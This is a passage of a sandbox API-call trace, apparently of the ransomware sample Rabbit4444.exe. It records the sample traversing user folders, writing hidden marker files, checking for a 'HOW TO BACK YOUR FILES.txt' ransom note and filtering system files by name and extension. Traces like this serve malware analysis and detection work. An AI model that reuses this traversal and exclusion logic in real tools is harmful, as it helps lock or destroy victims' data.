[0053.023] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.023] CloseHandle (hObject=0x27c) returned 1 [0053.026] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned 68 [0053.026] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.026] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd38548cf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8ed5982, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0053.026] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.026] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.026] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.026] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.026] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd38548cf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8ed5982, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.026] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.027] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.027] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.027] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.027] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.027] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8ed5982, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8ed5982, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8ed5982, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.027] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.027] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.027] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43087f08, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x43087f08, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0053.027] lstrcmpiW (lpString1="Low", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.027] lstrcmpiW (lpString1="Low", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.027] lstrcmpiW (lpString1="Low", lpString2="Rabbit4444.exe") returned -1 [0053.027] lstrcmpiW (lpString1="Low", lpString2=".") returned 1 [0053.027] lstrcmpiW (lpString1="Low", lpString2="..") returned 1 [0053.027] lstrcmpiW (lpString1="Low", lpString2="windows") returned -1 [0053.027] lstrcmpiW (lpString1="Low", lpString2="bootmgr") returned 1 [0053.027] lstrcmpiW (lpString1="Low", lpString2="pagefile.sys") returned -1 [0053.027] lstrcmpiW (lpString1="Low", lpString2="boot") returned 1 [0053.027] lstrcmpiW (lpString1="Low", lpString2="ids.txt") returned 1 [0053.027] lstrcmpiW (lpString1="Low", lpString2="NTUSER.DAT") returned -1 [0053.027] lstrcpyW (in: lpString1=0x130ebc2, lpString2="Low" | out: lpString1="Low") returned="Low" [0053.027] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64a8 [0053.027] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x92) returned 0x114098 [0053.027] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64b0 | out: ListHead=0xf68b0, ListEntry=0xf64b0) returned 0xf6410 [0053.027] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43087f08, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x43087f08, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 0 [0053.027] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0053.027] lstrcpyW (in: lpString1=0x130ebc2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.027] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.028] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.028] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.028] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.028] CloseHandle (hObject=0x278) returned 1 [0053.028] CloseHandle (hObject=0x27c) returned 1 [0053.028] GetCurrentThreadId () returned 0xd98 [0053.028] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf64b0 [0053.028] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0053.028] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x114098 | out: hHeap=0xe0000) returned 1 [0053.028] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf64a8 | out: hHeap=0xe0000) returned 1 [0053.028] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0053.029] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\" [0053.029] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\.BFC0E91B00AE8A0620D3" [0053.029] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.031] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.033] FlushFileBuffers (hFile=0x27c) returned 1 [0053.034] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.034] CloseHandle (hObject=0x27c) returned 1 [0053.035] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned 72 [0053.035] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.035] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43087f08, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xe8ed5982, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0053.035] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.035] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.035] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.035] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.035] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43087f08, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xe8ed5982, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.035] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.035] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.035] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.035] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.035] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.035] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8ed5982, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8ed5982, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8efbb85, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.035] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.035] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.035] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8ed5982, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8ed5982, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8efbb85, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0053.035] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0053.035] lstrcpyW (in: lpString1=0x130ebca, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.036] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.036] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.037] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.037] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.037] CloseHandle (hObject=0x278) returned 1 [0053.037] CloseHandle (hObject=0x27c) returned 1 [0053.037] GetCurrentThreadId () returned 0xd98 [0053.037] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6410 [0053.037] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0053.037] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113d78 | out: hHeap=0xe0000) returned 1 [0053.037] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6408 | out: hHeap=0xe0000) returned 1 [0053.037] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0053.037] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" [0053.037] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.BFC0E91B00AE8A0620D3" [0053.037] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.039] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.042] FlushFileBuffers (hFile=0x27c) returned 1 [0053.043] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.043] CloseHandle (hObject=0x27c) returned 1 [0053.043] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 72 [0053.043] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.043] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e2133a4, ftCreationTime.dwHighDateTime=0x1d32720, ftLastAccessTime.dwLowDateTime=0xe4c6308a, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe8efbb85, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0053.044] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.044] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.044] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.044] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.044] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e2133a4, ftCreationTime.dwHighDateTime=0x1d32720, ftLastAccessTime.dwLowDateTime=0xe4c6308a, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xe8efbb85, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.044] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.044] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.044] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.044] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.044] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.044] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8efbb85, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8efbb85, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8efbb85, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.044] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.044] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.044] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2111f8cb, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2111f8cb, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xc8e8141c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x94, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0053.044] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.044] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.044] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0053.044] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0053.044] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0053.044] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0053.044] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0053.044] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0053.044] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0053.044] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0053.044] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0053.044] lstrcpyW (in: lpString1=0x130ebca, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0053.044] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini", dwFileAttributes=0x22) returned 1 [0053.045] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini", dwFileAttributes=0x6) returned 1 [0053.045] lstrlenW (lpString="desktop.ini") returned 11 [0053.045] lstrlenW (lpString="Rabbit4444") returned 10 [0053.045] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0053.045] lstrlenW (lpString=".dll") returned 4 [0053.045] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0053.045] lstrlenW (lpString=".lnk") returned 4 [0053.045] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0053.045] lstrlenW (lpString=".ini") returned 4 [0053.045] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0053.045] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c6308a, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xe4c6308a, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xc4114d32, ftLastWriteTime.dwHighDateTime=0x1d327e6, nFileSizeHigh=0x0, nFileSizeLow=0x932, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0053.045] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.045] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.045] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Rabbit4444.exe") returned -1 [0053.045] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".") returned 1 [0053.045] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="..") returned 1 [0053.045] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="windows") returned -1 [0053.045] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="bootmgr") returned 1 [0053.045] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="pagefile.sys") returned -1 [0053.045] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="boot") returned 1 [0053.045] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ids.txt") returned -1 [0053.045] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="NTUSER.DAT") returned -1 [0053.045] lstrcpyW (in: lpString1=0x130ebca, lpString2="Google Chrome.lnk" | out: lpString1="Google Chrome.lnk") returned="Google Chrome.lnk" [0053.045] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk", dwFileAttributes=0x0) returned 1 [0053.046] lstrlenW (lpString="Google Chrome.lnk") returned 17 [0053.046] lstrlenW (lpString="Rabbit4444") returned 10 [0053.046] lstrcmpiW (lpString1="Chrome.lnk", lpString2="Rabbit4444") returned -1 [0053.046] lstrlenW (lpString=".dll") returned 4 [0053.046] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0053.046] lstrlenW (lpString=".lnk") returned 4 [0053.046] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0053.046] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9c00c4b, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa9c00c4b, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xa9c995d7, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x517, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Outlook.lnk", cAlternateFileName="MICROS~1.LNK")) returned 1 [0053.046] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.046] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.046] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="Rabbit4444.exe") returned -1 [0053.046] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2=".") returned 1 [0053.046] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="..") returned 1 [0053.046] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="windows") returned -1 [0053.046] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="bootmgr") returned 1 [0053.046] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="pagefile.sys") returned -1 [0053.046] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="boot") returned 1 [0053.046] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="ids.txt") returned 1 [0053.046] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="NTUSER.DAT") returned -1 [0053.046] lstrcpyW (in: lpString1=0x130ebca, lpString2="Microsoft Outlook.lnk" | out: lpString1="Microsoft Outlook.lnk") returned="Microsoft Outlook.lnk" [0053.046] SetFileAttributesW 